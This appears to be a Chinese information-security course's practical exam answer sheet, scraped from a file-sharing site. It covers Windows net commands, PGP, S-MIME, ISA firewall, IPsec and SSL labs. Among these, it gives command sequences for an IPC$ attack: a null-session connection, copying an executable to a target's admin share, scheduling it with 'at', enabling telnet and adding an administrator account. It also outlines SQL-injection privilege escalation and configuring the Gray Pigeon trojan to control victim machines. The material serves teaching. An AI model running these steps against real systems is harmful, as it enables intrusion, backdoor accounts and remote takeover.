信息安全技术与实施实操考试是题答案.docx
《信息安全技术与实施实操考试是题答案.docx》由会员分享,可在线阅读,更多相关《信息安全技术与实施实操考试是题答案.docx(36页珍藏版)》请在冰豆网上搜索。
信息安全技术与实施实操考试是题答案
网络安全技术实验
netsharezzz=d:
\zzz共享d:
\zzz共享名为zzz
netuse\\ip\zzz123/user:
zero
用户zero密码123连接共享
copy\\ip\zzz\xxx.xxxC:
\xxx.xxx
从共享复制xxx.xxx到C:
\xxx.xxx
[添加管理员用户]
netuserzero123/add添加zero用户密码为123
netlocalgroupadministratorszero/add
添加zero到administrators用户组
ftp
open?
.?
.?
.?
用户名密码
putx:
\xxx.xxx上传
getxxx.xxxx:
\xxx.xxx下载
bye退出
--------------------------------------------------------------------------
[IPC$攻击]
netuse\\ip\ipc$""/user:
""
copyC:
\Server.exe\\ip\ipc$
[计划任务]
nettime\\ip查看ip当前时间
at\\iptimeServer.exe
telnetip
添加管理员用户如上题
一.熟悉常见的系统命令
在命令行下完成以下命令的功能使用:
Netshare(创建共享文件夹)
C:
\>md56
C:
\>netshare56=c:
\56
56共享成功。
Netuse(访问并复制共享文件夹中的内容到本地计算机)
netuse\\ip\zzz123/user:
zero
用户zero密码123连接共享
copy\\ip\zzz\xxx.xxxC:
\xxx.xxx
从共享复制xxx.xxx到C:
\xxx.xxx
Netuser(创建用户账号、并将用户添加到管理员组)
ftp(完成FTP的上传、下载)
(一)IPC$攻击
利用IPC$漏洞对未打补丁的Windows计算机实施攻击
主要步骤:
1.扫描IPC$计算机
2.将Server.exe程序上传到目标机器
E:
\实验工具\IPC$攻击工具>netuse
E:
\实验工具\IPC$攻击工具>copyE:
\实验工具\IPC$攻击工具\SRV.EXE\\192.168.1.11\e$\SRV.EXE
3.为目标计算机指定计划任务
E:
\实验工具\IPC$攻击工具>at\\192.168.1.1119:
33srv.exe
4.用Telnet命令连接
sc\\192.168.1.11starttlntsvr
telnet192.168.1.11
5.添加管理员账号
E:
\>netuserlijietiansotian/add
E:
\>netlocalgroupadministratorslijietian/add
(二)SQL注入漏洞提权
1.将嘉枫文章管理系统发布到IIS上
2.用domain4.1进行旁注检测
3.猜解表名
4.猜解列名
5.破解用户名、密码
6.管理入口扫描
7.用得到的管理员账号登录
(三)电子邮件安全(PGP)
用PGP实现电子邮件的加密/签名和解密/校验
1.配置OutlookExpress可正确收发邮件
2.产生密钥对
3.导入对方公钥
4.签名并信任对方公钥
5.成功发送加密邮件,成功解密密文
6.成功发送签名邮件,正确验证签名
7.成功发送加密并签名邮件,正确解密校验邮件
(四)电子邮件安全(S-MIME)
用OutlookExpress自带的安全功能实现电子邮件的加密/签名和解密/校验
1.配置OutlookExpress可正确收发邮
2.下载安装CA证书’
3.申请并下载安装电子邮件安全证书
4.获得对方的数字标识
5.成功发送加密邮件,成功解密密文
6.成功发送签名邮件,正确验证签名
7.成功发送加密并签名邮件,正确解密校验邮件
(五)防火墙ISAServer2004
通过配置防火墙策略实现如下内容
1.在ISA主机上安装IIS,并配置Web服务,网站首页为自己的姓名和学号;
2.配置防火墙策略允许另一台计算机可以访问Web页面;
3.在另一台非ISA主机上安装配置POP3服务,并配置邮件服务;
4.配置防火墙策略允许ISA主机访问邮件服务。
Ø正确安装IIS,并配置Web服务,首页正确
Ø防火墙策略:
允许访问web服务,验证正确
Ø正确安装POP3服务,并建立域和邮箱,能提供邮件服务
Ø防火墙策略:
允许ISA主机访问邮件服务,可收发邮件
(六)IP安全策略
实现两台计算机之间所有IP通信的安全传输(要求使用证书进行身份验证)
1.下载并安装CA证书,使之成为受信任的根证书颁发机构;
2.分别为两台主机申请并安装客户端身份证书;
3.配置IP安全策略(要求安全通信),要求仅在特定的两台主机之间实现IP安全通信
4.
5.能够完成IP安全通信,并验证。
(可使用网络监视器或IPSec监视器捕获查看)
SSL
用SSL实现Web服务器和客户端(浏览器)之间的安全通信(要求客户端证书)。
1.在IIS的Web服务器中,生成证书申请文件;
2.为IIS的Web服务器申请证书;
3.下载并安装该证书;
4.配置Web服务器,申请SSL安全通道,并要求客户端证书;
5.为客户机的浏览器申请浏览器证书并下载、安装。
6.两台主机之间能够进行通信(访问网站),要求网站的主页显示自己的学号和姓名
(七)灰鸽子
用灰鸽子实现远程控制
1.正确配置服务器程序(即木马);
2.实现对肉机的控制(关闭/开启服务,远程重启或关机)